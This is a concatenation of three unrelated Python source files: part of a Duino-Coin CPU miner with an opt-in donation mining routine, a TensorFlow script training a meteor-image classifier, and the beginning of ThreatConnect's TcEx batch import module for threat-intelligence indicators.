# Calculate efficiency for use with the sleep function
efficiency = (100 - float(efficiency)) * 0.01
def Donate():
global donation_level
global donatorrunning
global donateExecutable
if osname == "nt":
cmd = (
"cd "
+ RESOURCES_DIR
+ "& Donate_executable.exe "
+ "-o stratum+tcp://xmg.minerclaim.net:3333 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
elif osname == "posix":
cmd = (
"cd "
+ RESOURCES_DIR
+ "&& chmod +x Donate_executable "
+ "&& ./Donate_executable "
+ "-o stratum+tcp://xmg.minerclaim.net:3333 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
if int(donation_level) <= 0:
prettyPrint(
"sys0",
Fore.YELLOW
+ getString("free_network_warning")
+ getString("donate_warning")
+ Fore.GREEN
+ "https://duinocoin.com/donate"
+ Fore.YELLOW
+ getString("learn_more_donate"),
"warning")
sleep(10)
elif donatorrunning == False:
if int(donation_level) == 5:
cmd += "80"
elif int(donation_level) == 4:
cmd += "60"
elif int(donation_level) == 3:
cmd += "40"
elif int(donation_level) == 2:
cmd += "20"
elif int(donation_level) == 1:
cmd += "10"
if int(donation_level) > 0:
debug_output(getString("starting_donation"))
donatorrunning = True
# Launch CMD as subprocess
donateExecutable = Popen(
cmd, shell=True, stderr=DEVNULL)
prettyPrint(
"sys0",
getString("thanks_donation"),
"warning")
def ducos1(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# DUCO-S1 algorithm
# Measure starting time
timeStart = time()
base_hash = sha1(str(lastBlockHash).encode('ascii'))
temp_hash = None
# Loop from 0 to 100*diff
for ducos1res in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1res % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
temp_hash = base_hash.copy()
temp_hash.update(str(ducos1res).encode('ascii'))
ducos1 = temp_hash.hexdigest()
# Check if result was found
if ducos1 == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1res / timeDelta
return [ducos1res, hashrate]
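# Illustrative sketch (not part of the miner): what ducos1() above searches
# for. Given a job (lastBlockHash, expectedHash, difficulty), the result is
# the nonce n in [0, 100*difficulty] whose SHA1 of lastBlockHash + str(n)
# equals expectedHash. The values below are made up for the example.
#
#     from hashlib import sha1
#     last_hash = "abc"
#     nonce = 42
#     expected = sha1((last_hash + str(nonce)).encode("ascii")).hexdigest()
#     assert ducos1(last_hash, expected, difficulty=1, efficiency=0)[0] == nonce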
def ducos1xxh(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# XXHASH algorithm
# Measure starting time
timeStart = time()
# Loop from 0 to 100*diff
for ducos1xxres in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1xxres % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
ducos1xx = xxhash.xxh64(
str(lastBlockHash) + str(ducos1xxres), seed=2811)
ducos1xx = ducos1xx.hexdigest()
# Check if result was found
if ducos1xx == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1xxres / timeDelta
return [ducos1xxres, hashrate]
def Thread(
threadid,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
rig_identiier,
algorithm,
hashrates_list,
totalhashrate_mean):
# Mining section for every thread
while True:
# Grab server IP and port
while True:
try:
# Use request to grab data from raw github file
res = requests.get(server_ip_file, data=None)
if res.status_code == 200:
# Read content and split into lines
content = (res.content.decode().splitlines())
# Line 1 = IP
masterServer_address = content[0]
# Line 2 = port
masterServer_port = 2813 # content[1]
debug_output(
"Retrieved pool IP: "
+ masterServer_address
+ ":"
+ str(masterServer_port))
break
except Exception as e:
# If there was an error with grabbing data from GitHub
prettyPrint(
"net"
+ str(threadid),
getString("data_error")
+ Style.NORMAL
+ Fore.RESET
+ " (git err: "
+ str(e)
+ ")",
"error")
debug_output("GitHub error: " + str(e))
sleep(10)
# Connect to the server
while True:
try:
soc = socket()
# Establish socket connection to the server
soc.connect((str(masterServer_address),
int(masterServer_port)))
soc.settimeout(SOC_TIMEOUT)
serverVersion = soc.recv(3).decode().rstrip(
"\n") # Get server version
debug_output("Server version: " + serverVersion)
if threadid == 0:
soc.send(bytes("MOTD", encoding="utf8"))
motd = soc.recv(1024).decode().rstrip("\n")
prettyPrint("net" + str(threadid),
" Server message: " + motd,
"warning")
if float(serverVersion) <= float(MINER_VER):
# If miner is up-to-date, display a message and continue
prettyPrint(
"net"
+ str(threadid),
getString("connected")
+ Fore.RESET
+ Style.NORMAL
+ getString("connected_server")
+ str(serverVersion)
+ ")",
"success")
break
else:
# Miner is outdated
prettyPrint(
"sys"
+ str(threadid),
getString("outdated_miner")
+ MINER_VER
+ ") -"
+ getString("server_is_on_version")
+ serverVersion
+ Style.NORMAL
+ Fore.RESET
+ getString("update_warning"),
"warning")
break
except Exception as e:
# Socket connection error
prettyPrint(
"net"
+ str(threadid),
getString("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debug_output("Connection error: " + str(e))
sleep(10)
if algorithm == "XXHASH":
using_algo = getString("using_algo_xxh")
else:
using_algo = getString("using_algo")
prettyPrint(
"sys"
+ str(threadid),
getString("mining_thread")
+ str(threadid)
+ getString("mining_thread_starting")
+ Style.NORMAL
+ Fore.RESET
+ using_algo
+ Fore.YELLOW
+ str(int(100 - efficiency * 100))
+ "% "
+ getString("efficiency"),
"success")
# Mining section
while True:
try:
while True:
# Ask the server for job
if algorithm == "XXHASH":
soc.sendall(bytes(
"JOBXX,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
else:
soc.sendall(bytes(
"JOB,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(threadid) +
"Correct job received")
break
except:
prettyPrint("cpu" + str(threadid),
" Server message: "
+ job[1],
"warning")
sleep(3)
while True:
computetimeStart = time()
if algorithm == "XXHASH":
algo_back_color = Back.CYAN
result = ducos1xxh(job[0], job[1], diff, efficiency)
else:
algo_back_color = Back.YELLOW
result = ducos1(job[0], job[1], diff, efficiency)
computetimeStop = time()
computetime = computetimeStop - computetimeStart
debug_output("Thread "
+ str(threadid)
+ ": result found: "
+ str(result[0]))
# Convert to kH/s
threadhashcount = int(result[1] / 1000)
# Add this thread's hash counter
# to the global hashrate counter
hashrates_list[threadid] = threadhashcount
                    # Calculate the total hashrate of all threads
sharehashrate = 0
for thread in hashrates_list.keys():
sharehashrate += hashrates_list[thread]
totalhashrate_mean.append(sharehashrate)
# Get average from the last 20 hashrate measurements
totalhashrate = mean(totalhashrate_mean[-20:])
while True:
# Send result of hashing algorithm to the server
soc.sendall(bytes(
str(result[0])
+ ","
+ str(result[1])
+ ","
+ "Official PC Miner ("
+ str(algorithm)
+ ") v"
+ str(MINER_VER)
+ ","
+ str(rig_identiier),
encoding="utf8"))
responsetimetart = now()
feedback = soc.recv(64).decode().rstrip("\n")
responsetimestop = now()
ping = int((responsetimestop - responsetimetart
).microseconds / 1000)
debug_output("Thread "
+ str(threadid)
+ ": Feedback received: "
+ str(feedback)
+ " Ping: "
+ str(ping))
if totalhashrate > 800:
# Format hashcount to MH/s
formattedhashcount = str(
"%03.2f" % round(totalhashrate / 1000, 2)
+ " MH/s")
elif totalhashrate > 100:
# Format for >100 kH/s
formattedhashcount = str(
"%03.0f" % float(totalhashrate)
+ " kH/s")
else:
# Format for small hashrates
formattedhashcount = str(
"%02.1f" % float(totalhashrate)
+ " kH/s")
if (totalhashrate > 1500
and accepted.value % 50 == 0):
prettyPrint("sys0",
" " + getString("max_hashrate_notice"),
"warning")
uptime, uptime_type = calculate_uptime(start_time)
if feedback == "GOOD":
# If result was correct
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.GREEN
+ " ✓"
+ getString("accepted")
+ Fore.RESET
+ str(int(accepted.value))
+ "/"
+ str(int(accepted.value + rejected.value))
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ "∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms. ∙"
+ " uptime "
+ str(uptime)
+ " "
+ uptime_type)
elif feedback == "BLOCK":
# If block was found
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ✓"
+ getString("block_found")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
rejected.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Style.BRIGHT
+ Back.RESET
+ Fore.RED
+ " ✗"
+ getString("rejected")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
break
break
except Exception as e:
prettyPrint(
"net"
+ str(threadid),
getString("error_while_mining")
+ Style.NORMAL
+ Fore.RESET
+ " (mining err: "
+ str(e)
+ ")",
"error")
debug_output("Error while mining: " + str(e))
sleep(5)
break
def prettyPrint(messageType, message, state):
# Print output messages in the DUCO "standard"
    # Message background color based on the message type (net/cpu/sys)
    if messageType.startswith("net"):
        background = Back.BLUE
    elif messageType.startswith("cpu"):
        background = Back.YELLOW
    else:
        # "sys" and any other message types
        background = Back.GREEN
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ messageType
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def initRichPresence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
debug_output("Discord rich presence initialized")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
def updateRichPresence():
# Update rich presence status
startTime = int(time())
while True:
try:
# Calculate average total hashrate with prefix
totalhashrate = mean(totalhashrate_mean[-20:])
if totalhashrate > 800:
totalhashrate = str(round(totalhashrate / 1000, 2)) + " MH/s"
else:
totalhashrate = str(round(totalhashrate, 1)) + " kH/s"
RPC.update(
details="Hashrate: " + str(totalhashrate),
start=startTime,
state="Acc. shares: "
+ str(accepted.value)
+ "/"
+ str(rejected.value + accepted.value),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
debug_output("Rich presence updated")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
sleep(15) # 15 seconds to respect Discord rate limit
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
# Processor info
cpu = cpuinfo.get_cpu_info()
# Colorama
init(autoreset=True)
title(getString("duco_python_miner") + str(MINER_VER) + ")")
try:
from multiprocessing import (
Manager,
Process,
Value,
cpu_count,
current_process
)
manager = Manager()
# Multiprocessing globals
khashcount = Value("i", 0)
accepted = Value("i", 0)
rejected = Value("i", 0)
hashrates_list = manager.dict()
totalhashrate_mean = manager.list()
except Exception as e:
print(e)
prettyPrint(
"sys0",
" Multiprocessing is not available. "
+ "Please check permissions and/or your python installation. "
+ "Exiting in 10s.",
"error")
sleep(10)
_exit(1)
try:
# Load config file or create new one
loadConfig()
debug_output("Config file loaded")
except Exception as e:
prettyPrint(
"sys0",
getString("load_config_error")
+ RESOURCES_DIR
+ getString("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " (config load err: "
+ str(e)
+ ")",
"error")
debug_output("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
Greeting()
debug_output("Greeting displayed")
except Exception as e:
prettyPrint(
"sys0",
"Error displaying greeting message"
+ Style.NORMAL
+ Fore.RESET
+ " (greeting err: "
+ str(e)
+ ")",
"error")
debug_output("Error displaying greeting message: " + str(e))
try:
# Start donation thread
Donate()
except Exception as e:
debug_output("Error launching donation thread: " + str(e))
try:
for x in range(int(threadcount)):
# Launch duco mining threads
thread.append(x)
thread[x] = Process(
target=Thread,
args=(
x,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
rig_identiier,
algorithm,
hashrates_list,
totalhashrate_mean))
thread[x].start()
except Exception as e:
prettyPrint(
"sys0",
"Error launching CPU thread(s)"
+ Style.NORMAL
+ Fore.RESET
+ " (cpu launch err: "
+ str(e)
+ ")",
"error")
debug_output("Error launching CPU thead(s): " + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
initRichPresence()
thrThread(
target=updateRichPresence).start()
except Exception as e:
debug_output("Error launching Discord RPC thead: " + str(e))
|
results_2_16_code.py
|
import tensorflow as tf
from tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten, BatchNormalization
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import Callback
from os.path import join
from os import listdir
import multiprocessing
from tensorflow.keras.regularizers import l2
from tensorflow.keras.constraints import unit_norm
from performanceMeasure import getPerformanceMeasures, plotAccuracyAndLoss, getProblematicMeteors
def trainCNN():
tf.keras.backend.clear_session()
modelNumber = 'model_2_16'
base_dir = 'C:\work_dir\meteorData\extraData_70_30' # We don't use filtered data ... Not so useful
results_dir = join('G:\GIEyA\TFG\meteor_classification\\results_2', modelNumber)
results_dir_weights = join(results_dir, 'weights')
train_dir = join(base_dir, 'train')
validation_dir = join(base_dir, 'validation')
ImageResolution: tuple = (300, 300) # (432, 432)
ImageResolutionGrayScale: tuple = (300, 300, 1) # (432, 432, 1)
DROPOUT: float = 0.30
EPOCHS: int = 30
LEARNING_RATE: float = 5e-4
# Training -> 62483 (3905x16)
# Validation -> 26780 (1673x16)
training_images = len(listdir(join(train_dir, 'meteors'))) + len(listdir(join(train_dir, 'non_meteors')))
validation_images = len(listdir(join(validation_dir, 'meteors'))) + len(listdir(join(validation_dir, 'non_meteors')))
batch_size: int = 64
steps_per_epoch: int = int(training_images / batch_size)
validation_steps: int = int(validation_images / batch_size)
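    # Worked example of the step counts above, using the image totals noted in the
    # comment: 62483 training images / 64 per batch -> 976 steps per epoch, and
    # 26780 validation images / 64 -> 418 validation steps (both truncated by int()).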
# Rescale all images by 1./255
train_datagen = ImageDataGenerator(rescale=1.0 / 255)
validation_datagen = ImageDataGenerator(rescale=1.0 / 255.)
train_generator = train_datagen.flow_from_directory(train_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
validation_generator = validation_datagen.flow_from_directory(validation_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
# elu activation vs relu activation -> model_2_02 and model_2_03
# dropout evaluation: model_2_02 (.3) vs model_2_06 (no dropout) vs model_2_07 (.4) vs model_2_08 (.5):
# model 2.9 -> Simple CNN (5 conv layers + 2 fully-connected) -> Only 123,209 parameters. Training time: 550 s/epoch
# model 2.10 -> 2.9 with filtered data
# model 2.11 -> Very complex CNN + BatchNormalization (???) -> ??? parameters. Training time: ???
# model 2.12 -> Add regularization and weight constrains : Not so useful (discarded)
# [kernel_regularizer=l2(l=0.01) + kernel_constraint=unit_norm() + BatchNormalization()]
# new model 2.12 -> BatchNormalization + kernel_regularizer
# model 2.13 -> BatchNormalization + unit_norm()
# model 2.14 -> Make it simpler in order to avoid overfitting
# model 2.15 -> Simpler and smaller input size
# model 2.16 -> Simpler
model = tf.keras.models.Sequential([
Conv2D(8, (7, 7), activation='elu', input_shape=ImageResolutionGrayScale,
strides=1, kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
Conv2D(12, (3, 3), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
Conv2D(4, (2, 2), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
# Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
# Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
# MaxPooling2D(pool_size=(2, 2)),
# BatchNormalization(),
# Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
# Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
# MaxPooling2D(pool_size=(2, 2)),
# BatchNormalization(),
# Conv2D(16, (2, 2), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
# Conv2D(8, (2, 2), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
# MaxPooling2D(pool_size=(2, 2)),
# BatchNormalization(),
Flatten(),
Dense(196, activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
BatchNormalization(),
Dense(8, activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
BatchNormalization(),
Dense(1, activation='sigmoid', kernel_initializer='he_uniform')
])
print(model.summary())
optimizer = Adam(learning_rate=LEARNING_RATE)
model.compile(optimizer=optimizer,
loss='binary_crossentropy',
metrics=['accuracy'])
class SaveModelCallback(Callback):
def __init__(self, thresholdTrain, thresholdValid):
super(SaveModelCallback, self).__init__()
self.thresholdTrain = thresholdTrain
self.thresholdValid = thresholdValid
def on_epoch_end(self, epoch, logs=None):
if ((logs.get('accuracy') >= self.thresholdTrain) and (logs.get('val_accuracy') >= self.thresholdValid)):
model.save_weights(join(results_dir_weights, modelNumber + '_acc_' + str(logs.get('accuracy'))[0:5]
+ '_val_acc_' + str(logs.get('val_accuracy'))[0:5] + '.h5'), save_format='h5')
callback_90_90 = SaveModelCallback(0.90, 0.90)
history = model.fit(train_generator,
validation_data=validation_generator,
steps_per_epoch=steps_per_epoch,
epochs=EPOCHS,
validation_steps=validation_steps,
shuffle=True,
verbose=1,
callbacks=[callback_90_90])
# model.load_weights(join(results_dir_weights, 'model_2_11_acc_0.919_val_acc_0.899.h5'))
# dataDir = 'C:\work_dir\meteorData\extra_data_filtered_30'
# problematicFile = join('G:\GIEyA\TFG\meteor_classification\\results_2', 'problematicData_40_1.txt')
# getProblematicMeteors(model, dataDir, ImageResolution, problematicFile, margin=0.40)
################################# PRINT MODEL PERFORMANCE AND GET PERFORMANCE MEASURES #################################
# Get performance measures:
getPerformanceMeasures(model, validation_dir, ImageResolution,
join(results_dir, 'performance_' + modelNumber + '.txt'), threshold=0.50)
# Plot Accuracy and Loss in both train and validation sets
plotAccuracyAndLoss(history)
#########################################################################################################################
if __name__ == '__main__':
p = multiprocessing.Process(target=trainCNN)
p.start()
p.join()
|
batch.py
|
"""ThreatConnect Batch Import Module."""
# standard library
import gzip
import hashlib
import json
import math
import os
import re
import shelve
import sys
import threading
import time
import traceback
import uuid
from collections import deque
from typing import Any, Callable, Optional, Tuple, Union
from .group import (
Adversary,
Campaign,
Document,
Email,
Event,
Group,
Incident,
IntrusionSet,
Report,
Signature,
Threat,
)
from .indicator import (
ASN,
CIDR,
URL,
Address,
EmailAddress,
File,
Host,
Indicator,
Mutex,
RegistryKey,
UserAgent,
custom_indicator_class_factory,
)
# import local modules for dynamic reference
module = __import__(__name__)
class Batch:
"""ThreatConnect Batch Import Module"""
def __init__(
self,
tcex: object,
owner: str,
action: Optional[str] = 'Create',
attribute_write_type: Optional[str] = 'Replace',
halt_on_error: Optional[bool] = True,
playbook_triggers_enabled: Optional[bool] = False,
):
"""Initialize Class properties.
Args:
tcex: An instance of TcEx object.
owner: The ThreatConnect owner for Batch action.
action: Action for the batch job ['Create', 'Delete'].
attribute_write_type: Write type for Indicator attributes ['Append', 'Replace'].
halt_on_error: If True any batch error will halt the batch job.
playbook_triggers_enabled: **DEPRECATED**
"""
self.tcex = tcex
self._action = action
self._attribute_write_type = attribute_write_type
self._halt_on_error = halt_on_error
self._owner = owner
self._playbook_triggers_enabled = playbook_triggers_enabled
# properties
self._batch_max_chunk = 5000
self._batch_max_size = 75_000_000 # max size in bytes
self._file_merge_mode = None
self._file_threads = []
self._hash_collision_mode = None
self._submit_thread = None
# shelf settings
self._group_shelf_fqfn = None
self._indicator_shelf_fqfn = None
# global overrides on batch/file errors
self._halt_on_batch_error = None
self._halt_on_file_error = None
self._halt_on_poll_error = None
# debug/saved flags
self._saved_xids = None
self._saved_groups = None # indicates groups shelf file was provided
self._saved_indicators = None # indicates indicators shelf file was provided
self.enable_saved_file = False
# default properties
self._batch_data_count = None
self._poll_interval = None
self._poll_interval_times = []
self._poll_timeout = 3600
# containers
self._groups = None
self._groups_shelf = None
self._indicators = None
self._indicators_shelf = None
# build custom indicator classes
self._gen_indicator_class()
# batch debug/replay variables
self._debug = None
self.debug_path = os.path.join(self.tcex.args.tc_temp_path, 'DEBUG')
self.debug_path_batch = os.path.join(self.debug_path, 'batch_data')
self.debug_path_group_shelf = os.path.join(self.debug_path, 'groups-saved')
self.debug_path_indicator_shelf = os.path.join(self.debug_path, 'indicators-saved')
self.debug_path_files = os.path.join(self.debug_path, 'batch_files')
self.debug_path_xids = os.path.join(self.debug_path, 'xids-saved')
@property
def _critical_failures(self): # pragma: no cover
"""Return Batch critical failure messages."""
return [
'Encountered an unexpected Exception while processing batch job',
'would exceed the number of allowed indicators',
]
def _gen_indicator_class(self): # pragma: no cover
"""Generate Custom Indicator Classes."""
for entry in self.tcex.indicator_types_data.values():
name = entry.get('name')
class_name = name.replace(' ', '')
            # temp fix for API issue where booleans are returned as strings
entry['custom'] = self.tcex.utils.to_bool(entry.get('custom'))
if class_name in globals():
# skip Indicator Type if a class already exists
continue
# Custom Indicator can have 3 values. Only add the value if it is set.
value_fields = []
if entry.get('value1Label'):
value_fields.append(entry['value1Label'])
if entry.get('value2Label'):
value_fields.append(entry['value2Label'])
if entry.get('value3Label'):
value_fields.append(entry['value3Label'])
value_count = len(value_fields)
class_data = {}
# Add Class for each Custom Indicator type to this module
custom_class = custom_indicator_class_factory(name, Indicator, class_data, value_fields)
setattr(module, class_name, custom_class)
# Add Custom Indicator Method
self._gen_indicator_method(name, custom_class, value_count)
def _gen_indicator_method(
self, name: str, custom_class: object, value_count: int
) -> None: # pragma: no cover
"""Dynamically generate custom Indicator methods.
Args:
name (str): The name of the method.
custom_class (object): The class to add.
value_count (int): The number of value parameters to support.
"""
method_name = name.replace(' ', '_').lower()
# Add Method for each Custom Indicator class
def method_1(value1: str, xid, **kwargs): # pylint: disable=possibly-unused-variable
"""Add Custom Indicator data to Batch object"""
indicator_obj = custom_class(value1, xid, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def method_2(
value1: str, value2: str, xid, **kwargs
): # pylint: disable=possibly-unused-variable
"""Add Custom Indicator data to Batch object"""
indicator_obj = custom_class(value1, value2, xid, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def method_3(
value1: str, value2: str, value3: str, xid, **kwargs
): # pylint: disable=possibly-unused-variable
"""Add Custom Indicator data to Batch object"""
indicator_obj = custom_class(value1, value2, value3, xid, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
method = locals()[f'method_{value_count}']
setattr(self, method_name, method)
def _group(
self, group_data: Union[dict, object], store: Optional[bool] = True
) -> Union[dict, object]:
"""Return previously stored group or new group.
Args:
group_data: An Group dict or instance of Group object.
store: If True the group data will be stored in instance list.
Returns:
Union[dict, object]: The new Group dict/object or the previously stored dict/object.
"""
if store is False:
return group_data
if isinstance(group_data, dict):
# get xid from dict
xid = group_data.get('xid')
else:
# get xid from object
xid = group_data.xid
if self.groups.get(xid) is not None:
# return existing group from memory
group_data = self.groups.get(xid)
elif self.groups_shelf.get(xid) is not None:
# return existing group from shelf
group_data = self.groups_shelf.get(xid)
else:
# store new group
self.groups[xid] = group_data
return group_data
def _indicator(
self, indicator_data: Union[dict, object], store: Optional[bool] = True
) -> Union[dict, object]:
"""Return previously stored indicator or new indicator.
Args:
indicator_data: An Indicator dict or instance of Indicator object.
store: If True the indicator data will be stored in instance list.
Returns:
Union[dict, object]: The new Indicator dict/object or the previously stored dict/object.
"""
if store is False:
return indicator_data
if isinstance(indicator_data, dict):
# get xid from dict
xid = indicator_data.get('xid')
else:
# get xid from object
xid = indicator_data.xid
if self.indicators.get(xid) is not None:
# return existing indicator from memory
indicator_data = self.indicators.get(xid)
elif self.indicators_shelf.get(xid) is not None:
# return existing indicator from shelf
indicator_data = self.indicators_shelf.get(xid)
else:
# store new indicators
self.indicators[xid] = indicator_data
return indicator_data
@staticmethod
def _indicator_values(indicator: str) -> list:
"""Process indicators expanding file hashes/custom indicators into multiple entries.
Args:
indicator: Indicator value represented as " : " delimited string.
Returns:
list: The list of indicators split on " : ".
"""
indicator_list = [indicator]
if indicator.count(' : ') > 0:
# handle all multi-valued indicators types (file hashes and custom indicators)
indicator_list = []
# group 1 - lazy capture everything to first <space>:<space> or end of line
iregx_pattern = r'^(.*?(?=\s\:\s|$))?'
iregx_pattern += r'(?:\s\:\s)?' # remove <space>:<space>
# group 2 - look behind for <space>:<space>, lazy capture everything
# to look ahead (optional <space>):<space> or end of line
iregx_pattern += r'((?<=\s\:\s).*?(?=(?:\s)?\:\s|$))?'
iregx_pattern += r'(?:(?:\s)?\:\s)?' # remove (optional <space>):<space>
# group 3 - look behind for <space>:<space>, lazy capture everything
# to look ahead end of line
iregx_pattern += r'((?<=\s\:\s).*?(?=$))?$'
iregx = re.compile(iregx_pattern)
indicators = iregx.search(indicator)
if indicators is not None:
indicator_list = list(indicators.groups())
return indicator_list
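    # Illustrative sketch (hypothetical values): for a File summary such as
    # "<md5> : <sha1> : <sha256>", _indicator_values() returns the three hash
    # strings as separate entries, while a single-valued summary such as
    # "badguy-example.com" comes back unchanged as a one-element list.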
@property
def action(self):
"""Return batch action."""
return self._action
@action.setter
def action(self, action):
"""Set batch action."""
self._action = action
def add_group(self, group_data: dict, **kwargs) -> Union[dict, object]:
"""Add a group to Batch Job.
.. code-block:: javascript
{
"name": "Example Incident",
"type": "Incident",
"attribute": [{
"type": "Description",
"displayed": false,
"value": "Example Description"
}],
"xid": "e336e2dd-5dfb-48cd-a33a-f8809e83e904",
"associatedGroupXid": [
"e336e2dd-5dfb-48cd-a33a-f8809e83e904:58",
],
"tag": [{
"name": "China"
}]
}
Args:
group_data: The full Group data including attributes, labels, tags, and
associations.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Union[dict, object]: The new group dict/object or the previously stored dict/object.
"""
return self._group(group_data, kwargs.get('store', True))
def add_indicator(self, indicator_data: dict, **kwargs) -> Union[dict, object]:
"""Add an indicator to Batch Job.
.. code-block:: javascript
{
"type": "File",
